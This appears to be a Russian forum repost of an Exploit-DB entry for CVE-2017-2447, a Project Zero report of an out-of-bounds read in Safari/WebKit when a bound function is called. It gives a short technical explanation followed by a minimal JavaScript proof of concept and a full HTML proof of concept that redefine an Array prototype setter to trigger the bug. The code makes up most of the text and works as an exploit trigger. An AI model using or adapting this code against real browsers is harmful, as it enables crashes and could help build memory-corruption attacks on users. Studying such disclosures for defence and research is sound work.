Exploit Apple Safari - Out-of-Bounds Read when Calling Bound Function

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
41743
Проверка EDB
  1. Пройдено
Автор
GOOGLE SECURITY RESEARCH
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2017-2447
Дата публикации
2017-03-27
Apple Safari - Out-of-Bounds Read when Calling Bound Function
HTML:
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033

There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered), and reads out of bounds.

This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.

This issue is only in WebKit trunk and Safari preview, it hasn't made it to regular Safari releases yet.


A minimal PoC is as follows, and a full PoC is attached.


var ba;

function s(){
	ba = this;
}


function dummy(){
	alert("just a function");
}


Object.defineProperty(Array.prototype, "0", {set : s });
var f = dummy.bind({}, 1, 2, 3, 4);
ba.length = 100000;
f(1, 2, 3);
-->

<html>
<body>
<script>

var ba;

function s(){
	alert("in s");
	ba = this;
}


function g(){
	alert("in g");
	return 7;
}


function dummy(){
	alert("just a function");
}

alert("start");

try{
Object.defineProperty(Array.prototype, "0", {set : s, get : g});
var f = dummy.bind({}, 1, 2, 3, 4);
alert("ba" + ba);
ba.length = 100000;
f(1, 2, 3);
}catch(e){

	alert(e.message);

}

</script>
</body>
</html>
 
Источник
www.exploit-db.com

Похожие темы